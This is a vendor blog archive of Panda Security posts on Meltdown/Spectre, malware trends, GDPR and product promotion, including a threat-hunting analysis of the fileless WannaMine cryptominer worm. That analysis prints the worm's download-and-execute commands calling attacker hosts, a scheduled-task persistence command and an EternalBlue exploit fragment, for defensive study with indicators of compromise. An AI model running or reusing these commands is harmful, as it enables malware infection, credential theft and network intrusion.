Tag Archives: adaptive defense

Meltdown and Spectre, behind the first security hole discovered in 2018

The security flaw affects virtually every operating system, in particular those based on Intel, AMD and ARM processors.

2018 could not have had a worse start from a cyber-security perspective as, yesterday, a major security hole was found in Intel, AMD and ARM processors.  The critical flaw discovered in the affected computers’ architecture and operating system has rocked the technology industry, and developers around the world have rushed to roll out fixes.

The vulnerability, leveraged by the Meltdown exploit on Intel systems, is particularly worrying as it can lead to exfiltration of sensitive data such as login credentials, email messages, photos and other documents. It enables attackers to use a malicious process run at user level on the affected workstation or server in order to read other processes’ memory, even that of high-privileged kernel processes.

The flaw can hit home users and virtually every company, as Spectre affects all kinds of computers: desktops, laptops, Android smartphones, on-premises servers, cloud servers, etc. The more critical information handled by a potential victim, the greater the risk to suffer the attack.

Microsoft and Linux have already released updates for their  customers security. We’d like to inform our customers and partners that the tests carried out by Panda Security show that there are no compatibility conflicts between our endpoint security solutions and Microsoft’s security update.

At present, there is no evidence of public security attacks leveraging the flaw, but judging from past experience, it is not at all improbable that we may witness an avalanche of Trojans and spam campaigns attempting to exploit the vulnerability.

How to mitigate the vulnerability

Newer generation processors are not affected by the flaw, however, replacing all vulnerable systems is not a viable option at this time.

For that reason, the only possible countermeasure at this stage is to mitigate the vulnerability at operating system level. Microsoft and Linux are working on or have patches ready that prevent the exploitation of this hardware bug, with Linux being the first vendor to release a fix.

Microsoft, which initially planned to include a patch in the security update scheduled for Tuesday January 9, released a fix yesterday that is already available on the most popular operating systems and will be gradually deployed to all other systems. For more information, please visit this page.

It is worth mentioning that Microsoft’s security patch is only downloaded to target computers provided a specific registry entry is found on the system. This mechanism is designed to allow for a gradual update of systems coordinated with security software vendors. This way, computers will only be updated once it has been confirmed that there is no compatibility issue between the patch and the current security product.

Technical Support

For more information, please refer to the following technical support article . There you will find detailed information about the Microsoft patch validation process, how to manually trigger the patch download, and the way our products will be gradually updated to allow the automatic download of the new security patch just as with any other update.

We’d also like to encourage you to find detailed information about Microsoft’s security update and the potential impact it can have on desktop, laptop and server performance.

Finally, Microsoft, Mozilla and Google have warned of the possibility that the attackers may try to exploit these bugs via their Web browsers (Edge, Firefox and Chrome), and that temporary workarounds will be released over the next few days to prevent such possibility.  We recommend that you enable automatic updates or take the appropriate measures to have your desktops, laptops and servers properly protected.

Cyber-Security recommendations

Additionally, Panda recommends that you implement the following best security practices:

  • Keep your operating systems, security systems and all other applications always up to date to prevent security incidents.
  • Do not open email messages or files coming from unknown sources. Raise awareness among users, employees and contractors about the importance of following this recommendation.
  • Do not access insecure Web pages or pages whose content has not been verified. Raise awareness among home and corporate users about the importance of following this recommendation.
  • Protect all your desktops, laptops and servers with a security solution that continually monitors the activity of every program and process run in your organization, only allowing trusted files to run and immediately responding to any anomalous or malicious behavior.

Panda Security recommends all companies to adopt Panda Adaptive Defense 360, the only solution capable of providing such high protection levels with its managed security services. Discover how Panda Adaptive Defense 360 and its services can protect you from these and any future attacks.

Customers using our Panda Security home use solutions  also enjoy maximum protection as they feed off the malware intelligence leveraged by Panda Adaptive Defense 360, as shown in the latest independent comparative reviews. The protection capabilities of Panda Security’s technologies and protection model are demonstrated in the third-party tests conducted by such prestigious laboratories as AV-Comparatives.

How do these vulnerabilities affect Panda Security’s cloud services?

Cloud servers where multiple applications and sensitive data run simultaneously are a primary target for attacks designed to exploit these hardware security flaws.

In this respect, we’d like to inform our customers and channel partners that the cloud platforms that host Panda Security’s products and servers, Azure and Amazon, are managed platforms which were properly updated on January 3, and are therefore protected against any security attack that takes advantage of these vulnerabilities.

What effect do these vulnerabilities have on AMD and ARM processors?  

Despite the Meltdown bug seems to be limited to Intel processors, Spectre also affects ARM processors on Android and iOS smartphones and tablets, as well as on other devices.

Google’s Project Zero team was the first one to inform about the Spectre flaw on June 1, 2017, and reported the Meltdown bug before July 28, 2017. The latest Google security patch, released in December 2017, included mitigations to ‘limit the attack on all known variants on ARM processors.’

Also, the company noted that exploitation was difficult and limited on the majority of Android devices, and that the newest models, such as Samsung Galaxy S8 and Note 8, were already protected. All other vendors must start rolling out their own security updates in the coming weeks.

The risk is also small on unpatched Android smartphones since, even though a hacker could potentially steal personal information from a trusted application on the phone, they would have to access the targeted device while it is unlocked as Spectre cannot unlock it remotely.

Apple’s ARM architecture chips are also affected, which means that the following iPhone models are potentially vulnerable: iPhone 4, iPhone 4S, iPhone 5 and iPhone 5C. Apple has not released any statements regarding this issue, so it is possible that they managed to fix the flaw in a previous iOS version or when designing the chip.

As for the consequences and countermeasures for AMD processors, these are not clear yet, as the company has explained that its processors are not affected by the Spectre flaw.

We’ll keep you updated as new details emerge.

 

The post Meltdown and Spectre, behind the first security hole discovered in 2018 appeared first on Panda Security Mediacenter.

Read More

2017 in Figures: The Exponential Growth of Malware

2017 was especially hectic for cybercrime, especially when it comes to malware and its offshoots. The increased number of attacks and, above all, the professionalization of the techniques used by cybercriminals has been at the root of malware’s exponential proliferation. In 2017 alone (according to data collected up to September 20), PandaLabs registered 15,107,232 different malware files that we had never seen before. But the total number of new malware is much higher — up to 285,000 new malware samples every day.

It makes perfect sense that the top 10 of malware files in our cloud includes names like WannaCry, the ransomware that caused havoc in business networks around the world, and a version of CCleaner, installed by more than two million users. But in addition to the trends that have been making headlines everywhere, what conclusions can we draw about the state of malware in 2017? We discuss the essentials in PandaLabs’ Annual Report.

Malware’s Attempt to Go Unnoticed

Upon reviewing the figures, we see that of the 15,107,232 files registered, 99.10% have been seen only once. That is, 14,972,010 files. We have only seen 989 malware files on more than 1,000 computers, 0.01%. This corroborates what we already knew: namely, that aside from a few exceptions — such as the abovementioned WannaCry or HackCCleaner — most malware changes every time it infects, so each copy has a very limited distribution.

This year’s data makes it clear that although there are many more types of malware, each of them infects only a few devices individually. By attacking the minimum number of possible devices, each specimen reduces the risk of being detected and fulfils its purpose: to go unnoticed and ensure the attack’s success.

In any case, the total number of new malware samples (15 million) is not so relevant when it comes to calculating risk. What really affects us is the frequency with which we can individually confront the malware itself. To evaluate this risk, PandaLabs measured only those malware infection attempts that were not detected by signatures or by heuristics.

Recommendations for a Malware-free 2018

Following these tips will help reduce the risk of becoming a victim of malware:

  • Think before you click: do not access links sent to you by strangers.
  • Avoid downloading applications from unreliable sources.
  • Do not wait until tomorrow — keep up with system updates.
  • Use strong passwords to protect your identity.
  • Choose an advanced cybersecurity platform.

Our protection technologies improve and are updated as the amount of malware grows, which is why we are able to detect the threats that other solutions cannot. Panda Adaptive Defense is keeping up with threats and offers the market the services and tools needed to face whatever awaits in 2018. We’re ready to take on the new year!

The post 2017 in Figures: The Exponential Growth of Malware appeared first on Panda Security Mediacenter.

Read More

Threat Hunting, the Investigation of Fileless Malware Attacks

 Fileless Monero WannaMine, a new attack discovered by PandaLabs

 

Mining cryptocurrencies like Bitcoin, Ethereum or Monero is nothing new. In fact, in recent years we have seen numerous attacks whose main objective is the installation of mining software. For example, it is worth remembering that before WannaCry, we had already seen attackers use the NSA EternalBlue exploit to infiltrate companies and install this type of software on their victims’ devices.

It’s safe to say that it is a booming business, as sophistication of the attacks continues to increase. A few days ago we detected a new worm that uses both hacking tools and scripts to spread through corporate networks and mine the Monero cryptocurrency in any network it makes its way into.

With Adaptive Defense, we monitor all running processes in real time on every computer where it is installed. When our Threat Hunting team observed the following command attempting to execute through one of the processes on one computer, alarms were raised:

cmd /v:on /c for /f “tokens=2 delims=.[” %i in (‘ver’) do (set a=%i)&if !a:~-1!==5 (@echo on error resume next>%windir%11.vbs&@echo Set ox=CreateObject^(“MSXML2.XMLHTTP”^)>>%windir%11.vbs&@echo ox.open “GET”,”http://stafftest.firewall-gateway.com:8000/info.vbs“,false>>%windir%11.vbs&@echo ox.setRequestHeader “User-Agent”, “-“>>%windir%11.vbs&@echo ox.send^(^)>>%windir%11.vbs&@echo If ox.Status=200 Then>>%windir%11.vbs&@echo Set oas=CreateObject^(“ADODB.Stream”^)>>%windir%11.vbs&@echo oas.Open>>%windir%11.vbs&@echo oas.Type=1 >>%windir%11.vbs&@echo oas.Write ox.ResponseBody>>%windir%11.vbs&@echo oas.SaveToFile “%windir%info.vbs”,2 >>%windir%11.vbs&@echo oas.Close>>%windir%11.vbs&@echo End if>>%windir%11.vbs&@echo Set os=CreateObject^(“WScript.Shell”^)>>%windir%11.vbs&@echo os.Exec^(“cscript.exe %windir%info.vbs”^)>>%windir%11.vbs&cscript.exe %windir%11.vbs) else (powershell -NoP -NonI -W Hidden “if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains(’64’)){IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.firewall-gateway.com:8000/info6.ps1′)}else{IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.firewall-gateway.com:8000/info3.ps1′)}“)

Analysis of Network Propagation

Soon after beginning our investigation from PandaLabs, we observed how the attackers, knowing that they’d been discovered, closed off command and control servers, but before they could we were able to download the following files:

  • b6fcd1223719c8f6daf4ab7fbeb9a20a            ps1 ~4MB
  • 27e4f61ee65668d4c9ab4d9bf5d0a9e7 vbs ~2MB

They are two highly obfuscated scripts. “Info6.ps1” loads a Mimikatz module (dll) in a reflectively (leaving the disk untouched) so that it can steal credentials. These credentials will be used later to move laterally on internal (unprotected) networks.

The script implements, in Powershell, the famous NetBios exploit, known as EternalBlue (MS17-010), so that it can proceed to infect other not-yet-patched Windows computers on the network.

$TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
$TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
[byte[]]$fakeSrvNetBufferNsa = @(0x00,0x10,0x01,0x00,0x00
[byte[]]$fakeSrvNetBufferX64 = @(0x00,0x10,0x01,0x00,0x00
$fakeSrvNetBuffer = $fakeSrvNetBufferNsa
[byte[]]$feaList=[byte[]](0x00,0x00,0x01,0x00)
$feaList += $ntfea[$NTFEA_SIZE]
$feaList +=0x00,0x00,0x8f,0x00+ $fakeSrvNetBuffer
$feaList +=0x12,0x34,0x78,0x56
[byte[]]$fake_recv_struct=@(0x00,0x00,0x00,0x00,0x00,0x00

At the same time it makes use of WMI to remotely execute commands. Once the passwords for a computer are obtained, we see the “wmiprvse.exe” process on that computer execute a command line similar to the following:

powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4Ad…

If we decode the “base 64” of this command line, we obtain the script shown in Annex I.

Persistence in the System

Within one of the scripts, the following command can be found to achieve persistence in the system:

cmd /c echo powershell -nop “$a=([string](Get-WMIObject -Namespace rootSubscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(‘SCM Event Filter’)))) {IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.spdns.eu:8000/mate6.ps1’)}” >%temp%y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR “%temp%y1.bat” &&SCHTASKS /run /TN yastcat

As you can see, it programs a daily task that downloads and executes the “y1.bat” file.

Note that we do not have this file at our disposition, as the command and control servers are currently offline.

Infection Vector 

We still do not know the initial infection vector, since networks on which we detected and blocked the infection were in the process of deploying Adaptive Defense at that time and did not have the whole network protected with our advanced cybersecurity solution. For this reason, we have not been able to determine who the “patient zero” was and how it became compromised.

It could be a download/execution of a file/Trojan that initially activated the worm, or it could have been executed remotely using some exploit.

Command and Control Servers

From the “info6.ps1” script, we were able to obtain the following command and control servers.

  • spdns.eu
  • firewall-gateway.com
  • 179.67.243
  • 184.48.95

Note that on October 27, 2017, these servers ceased to be operative.

118.184.48.95

107.179.67.243

stafftest.spdns.eu

stafftest.firewall-gateway.com

IOCs

  • exe ( Monero, MD5 2ad7a39b17d08b3a685d36a23bf8d196 )
  • %windir%11.vbs
  • %windir%info.vbs
  • %windir%info6.ps1
  • dll
  • dll
  • Tarea programada “yastcat”
  • spdns.eu
  • firewall-gateway.com
  • 179.67.243
  • 184.48.95

Conclusion

Once again, we are witnessing the professionalization of increasingly advanced attacks. Even when it is only a matter of installing Monero miners (and we leave aside data theft, sabotage, or espionage), attackers are using advanced techniques and sharp tactics. The fact that it is a fileless attack makes it so that a majority of traditional antivirus solutions are barely able to counteract or even detect it, and its victims can only wait for the necessary signatures to be generated (the attack is fileless, but as we have seen at one point, both the scripts and the Monero client are downloaded).

But this only serves for this particular attack, and anything that varies even slightly will be useless, not to mention that only the end of the attack is detected, without seeing how it moves through the network and compromises computers.

Since Adaptive Defense not only classifies all running processes on every computer, we are able to monitor the entire network in real time, something which is becoming increasingly necessary as attackers resort to malwareless techniques in which they abuse legitimate system tools.

Among the events we monitor, we can find:

  • Process creation and remote injection
  • Creation, modification and opening of files
  • Creation and modification of registry entries
  • Network events (communication aperture, file download, etc.)
  • Administrative events (creation of users, etc.)

We will keep you updated with any findings from our Threat Hunting, as well as the detection of any new attacks.

The post Threat Hunting, the Investigation of Fileless Malware Attacks appeared first on Panda Security Mediacenter.

Read More

The Scariest Cyber Nightmares in Recent Years

Halloween is just around the corner. As the day approaches, we have to be aware that “trick or treat” means something a little more sinister when it comes to cybercriminals. They may play some bothersome pranks, or they may in fact try to infect our computers with real, no-joke malware that will undoubtedly ruin our holiday spirits.

This Halloween will be marked by threats and cyberattacks organized by criminal groups that shake the foundations of businesses and infrastructures every day. In 2017, WannaCry showed us how it was possible to indiscriminately attack corporate networks all over the world. We’ve also seen surgical attacks, like Petya/GoldenEye, whose target was much more defined. Then, just in time for the spookiest holiday of the year, we saw the big Bad Rabbit.

These are just a few recent cases, but can you remember the most terrifying attacks of recent years?

Hackers and Organized Groups, the Latest Cyber Nightmare

There are all different types of hackers with a wide variety of motives. From the cyber arms dealer — a hacker who develops and sells malware and other hacking tools and exploit kits —  to other cybercriminals specializing in ransomware; from so-called bankers (hackers specialized in credit or financial card information theft) to contract hackers who belong to a well-established industry and who offer their services in return for remuneration.

They are all behind the most terrifying cyber nightmares, creating diabolical malware and exploiting tenebrous vulnerabilities to haunt your company.

Protect Your Company Year-Round and Enjoy a Bone-Chilling Halloween

Using the right tools is essential to keeping your network safe. A defense method able to protect against malware of all types, even before an attack can begin, is indispensable. Such solutions allow continuous monitoring of network and endpoint activity in real time. Panda Adaptive Defense is a pioneer in this type of technology, and combines state-of-the-art protection with detection and remediation capabilities with the ability to classify 100% of running processes. This approach secures the system against external attacks, and even attacks originating within the network itself.

Make sure Halloween comes only once a year. Manage, control and protect your data against all kinds of advanced threats.

The post The Scariest Cyber Nightmares in Recent Years appeared first on Panda Security Mediacenter.

Read More

Don’t Let Yourself Become the Next Equifax

Last month we wrote about the biggest hack of sensitive personal data in history. Equifax, the financial entity that manages data for more than 820 million consumers and more than 91 million businesses around the world, suffered a global attack by an organized group called the PastHole Hacking Team, affecting customer data not only from the United States, but also Canada and the United Kingdom.

Following the recent events, it has come to light that the massive hacking attack is not the only grievance that the company has suffered. As it turns out, there was also malware on the company’s website.

Ars Technica reports that a security analyst named Randy Abrams came to the site to check his credit information when he encountered a fake Adobe Flash installer, one of those pop-ups that abound on the internet and demand that you “click here”, only to redirect you to some malicious site full of internet junk.

The subsequent analysis revealed that the “promoted” malicious software is called Adware.Eorezo and is marked as malware by only three cybersecurity solutions in the world, including Panda Security, testament to the great effort that went into hiding the code so as to cause as much damage as possible.

Panda’s good performance against Adware.Eorezo coincides with the AV-Comparatives Business Security Report recognizing the Adaptive Defense 360 ​​smart cybersecurity solution. This platform would successfully prevent an organization from becoming the victim of an attack such as Equifax. In the words of the independent laboratory, “Panda Adaptive Defense 360 ​​is managed by a well-designed, clearly laid-out cloud-based console, which would be very straightforward for less-experienced administrators to use. This makes it particularly suitable for small businesses, while its EDR features will make it appealing to corporations. ”

Now, the question is, how did attackers manage to slip past the security barriers at Equifax, a site with troves of incredibly sensitive data? Things may have turned out differently with the right security solution. Only unlimited visibility and total real-time control of advanced threats can be effective in protecting the IT infrastructure.

The post Don’t Let Yourself Become the Next Equifax appeared first on Panda Security Mediacenter.

Read More

Debunking the Myths of the GDPR

The GDPR (General Data Protection Regulation) is a hot topic among experts in cybersecurity and privacy. For consumers, the GDPR will strengthen the protection of basic rights on the internet and give control of personal data back to the user. But what does this mean for companies?

As the date for its entry into force approaches, and having explained the most important changes the regulation will bring about, in this article we will have a look at some of the myths surrounding the GDPR.

Myth 1: “The GDPR only affects companies in the European Union”

This is far from being the truth. The GDPR rules will apply to all companies that offer goods or services to people from the EU, regardless of where their offices or servers are located. Therefore, the GDPR applies to all companies that process information from EU citizens, making this the first global data protection law. For example, if an EU citizen uses a US-based social network, makes an ecommerce transaction in Japan, or uses an Argentinian platform for vacation rentals, all those companies must comply with the GDPR.

Myth 2: “All security incidents must be reported within 72 hours”

This is one of the most widespread myths and has been accepted as a general rule, but there is some nuance to it. First, only personal data leaks need to be reported — it is not required in the case of security incidents or data breaches that do not involve personal data. This means that any breach that affects the confidentiality or integrity of personal information must be reported.

Moreover, the countdown for the 72 hour deadline does not start when the incident occurs, but rather when the company becomes aware that it has suffered a personal data breach. If for some reason it is not possible to report the breach to the authorities within this time period, the limit can be extended provided that the organization justifies the delay.

Myth 3: “All data must be encrypted in order to be in compliance with the GDPR”

This is false for several reasons. The GDPR requires that measures be implemented to provide an appropriate level of security, based on an assessment of the risk involved in any action that requires, for example, the processing or storage of personal data.

Although encryption is a recommended measure, it is not a must. Everything depends on the risks associated with not encrypting said personal data. Thus, in the case of sensitive data, such as patient medical information, the GDPR recommends encryption and other robust security measures, such as secure algorithms.

Panda Security Can Help Ease the Transition

These are just three of the myths shrouding a regulation that will mark a before and after in the protection of personal data. To help all types of companies adapt and comply with the GDPR, at Panda we have prepared the “Preparation Guide to the New European General Data Protection Regulation”. In this guide, we respond to major issues related to the GDPR: How does it affect my business? What obligations does this regulation bring about? What happens if I do not comply with these obligations?

With this whitepaper, and using tools included in our Adaptive Defense solution, Panda can help meet the requirements imposed by the new regulation. Although the law will not come into effect until 2018, it is vital to understand the implications of the GDPR and to implement a plan of action.

The post Debunking the Myths of the GDPR appeared first on Panda Security Mediacenter.

Read More

Building Resistant Companies

Ransomware is on the rise, and in recent years has become one of the biggest headaches for IT departments in both large and small organizations. With 90 million attacks worldwide in 2016, and more than 180 million attacks expected for 2017, the million-dollar question is: how do we face these attacks? At Panda Security and Deloitte EMEA, we have no doubt about the matter — corporations can protect themselves by building their resistance.

The right approach and continuous response capabilities

Our new aim is to face the challenge conjointly, both structurally and in terms of the methodologies used by Panda Security and Deloitte EMEA. Increasingly aware of traditional security solutions’ shortcomings, namely their inability to handle attacks that use advanced techniques, such as those that use non-malicious tools, we made the decision to be proactive and reinvent cybersecurity.

How will we do this? With an advanced solution based on situational analysis:

  • Attackers are now more efficient than ever before. While attackers are able to compromise systems in just minutes or hours, businesses often take months or even years to react.
  • They attack the endpoint because it is from there that they can access other targets, exfiltrate information, steal credentials, or deploy other attacks.
  • The lack of resources and competence at companies is evidences by the statistic that hardly 4% of security alerts are investigated.

And we will also be watching the challenges that our clients face:

  • The availability of ransomware-as-a-service
  • Negative economic and reputational side effects
  • Data and productivity loss
  • Data protection initiatives in light of the GDPR

The result? A cyberintelligence platform that categorizes and correlates all of the data obtained about cyberthreats to carry out Prevention, Deteciton, Response, and Remediation tasks, combined with attack area reduction services rendered by Adapted Defense.

Panda and Deloitte: an anti-ransomware alliance

Recent events have proven the strength of a security model that has the answers to client’s needs:

  • Deloitte EMEA, invulnerable to the latest security breaches: this past week, we’ve learned that unknown actors allegedly had access to Deloitte USA’s email for months, with no major setbacks. However, the European branch, protected by Adaptive Defense, was unaffected by the cyberattack.
  • The major ransomware attacks of the year: both the WannaCry ransomware, which affected more than 150 countries and carried with it losses reaching up to 4 billion dollars, and the subsequent Petya/GoldenEye attacks, never reached a single Adaptive Defense user who had lock mode activated.

Governments and large public and private companies are betting on this strategy, making Adaptive Defense the best-selling security solution in the history of Panda Security, with a global market share of over 22% in EDR solutions. Multinationals in all types of strategic sectors (financial, telecommunications, military, energy, etc.) rely on Panda Security to protect their systems with Adaptive Defense.

The post Building Resistant Companies appeared first on Panda Security Mediacenter.

Read More

Post-vacation cybersecurity tuneup: Get your company ready!

panda-security-tips-companies

It’s that time of the year when most of us return to the stress of our jobs after having enjoyed a well-deserved summer vacation. But, if getting over the post-vacation blues is hard for anyone, for the members of the IT team it is a real nightmare: out-of-date computers, new software vulnerabilities, systems that do not work, organizational changes… It’s time to get ready for the situations you’ll have to face in the return to normality. And you better do it as thoroughly as possible to avoid risks. Here is a list of things you need to do in order to make sure that everything is in order.

Update

The first thing you must certainly do is update all systems, patch all applications, and download the latest malware signatures and security updates. This process is critical and must be completed immediately. You never know what may have happened during the time you’ve been on vacation.

Check your operating systems’ hardening status 

Hardening your computers’ operating systems is essential to keep your entire network safe. There are some differences between general and specific hardening. However, in both cases you must check that all necessary security measures are properly in place. And if you don’t have a hardening plan yet, now is the time to implement one.  Evaluate the possibility of unauthorized access, prevent user misuse, protect your network from known attack vectors, etc.

Review security rules with your network users

It is essential that your organization’s employees and other users are aware of the basic security protocols required to ensure network protection. Remind them of the need to comply with the company’s password policy, and ban the installation of non-corporate software on corporate computers. Reviewing all of these security aspects and procedures with your employees will save you from future headaches.

Use a centralized security tool

The best security solution for your business is a centralized defense system that allows you to monitor your network in real time, make decisions, and take immediate action. With Panda Endpoint Protection, you’ll be able to keep your company safe from a single, centralized, cloud-based console, across all platforms and with minimal resource consumption.

Monitor your networks

Having a good intrusion detection system (IDS) is crucial. Intrusion detection systems inspect network traffic thoroughly, comparing it against identifiers of known attacks and suspicious behavior. Check the HIDS system deployed to your customers and your network IDS to make sure that everything is in order.

Check your firewall rules

Having a good firewall is essential too. Hardware firewalls are great allies, but perimeter protection rules must be regularly checked and updated. Some security solutions, such as Panda Adaptive Defense, allow organizations to monitor connections efficiently and automatically, maximizing efficiency and minimizing efforts.

ISO 27001, your best ally

ISO/IEC 27001 is an information security management standard that specifies all the directives you must follow to keep your corporate network safe. Regardless of whether or not you apply for the certification, the ISO standard can be used to check that you comply with every single safety procedure required to ensure that your systems are operating properly. The aforementioned recommendations are just a summary of the directives included in the ISO standard, which covers all of the above and much more. Faithfully following all these recommendations may seem difficult, but it is definitely the best starting point to make sure your business runs smoothly. And what better time to do this than now that you have just returned to work charged up after your vacation?

The post Post-vacation cybersecurity tuneup: Get your company ready! appeared first on Panda Security Mediacenter.

Read More

Panda Security and Deloitte Have Exciting Announcement for the Gartner Summit

Following the success of the Gartner Security & Risk Management Summit in the US, Panda Security will also be participating in the London conference held on 18-19 September 2017. The summit will address the major challenges facing IT security leaders today. Analysts, panellists, and presenters will offer proven practices, technologies and methods to help adjust to the digital transformation and managing the increase in cybersecurity risks.

Panda Security will discuss how to protect your business with Adaptive Defense, the new cybersecurity model. We will be at Booth #S24.

In addition to sharing experiences at stand S24, we will be giving a joint presentation in conjunction with Deloitte. Juan Santamaría, General Manager of Panda, and Edward Moore, Associate Director of Cybersecurity at Deloitte EMEA, will discuss the fundamentals of cyberdefense for companies. In a talk titled ‘From Incident Response to Continuous Response Management, Building Resilience in Organizations’, we will discuss how to avoid economic losses and reputational damages brought about by cyberattacks such as ransomware.  The session will be held on Tuesday 19 September, from 10:35-10:55 in the Solution Showcase Theatre on Level 1.

As 100% prevention is not possible, organizations must continually improve its detection and incident response capabilities to significantly reduce the probability of experiencing a damaging breach.

Learn from the directors of Panda Security and Deloitte EMEA how to maximise returns on your company’s investments using the latest resilience practices.

Adaptive Defense, the Common Link Between Deloitte and Panda Security

Businesses are currently facing unprecedented challenges as they process the large volumes and high speeds of modern digital interactions. With exponential increases in attacks originating from unknown threats (up more than 40% from last quarter alone), it’s logical to conclude that companies need to be doing more to reinforce their security and control. It’s for this reason that Panda Security and Deloitte EMEA have created a Cyber Alliance to provide an integrated, dynamic, and adaptive security ecosystem.

At the heart of this agreement is Adaptive Defense, a managed cybersecurity service based on continuous monitoring of all active processes, with automatic classification via artificial intelligence, and behaviour analysis by Security Operation Center experts. This ecosystem allows organization to become more resilient and reduces significantly the probability of experiencing a damaging breach.

You can see here further details on the joint Panda Security and Deloitte talk and add to your calendar for the Gartner Security & Risk Management Summit here.

The post Panda Security and Deloitte Have Exciting Announcement for the Gartner Summit appeared first on Panda Security Mediacenter.

Read More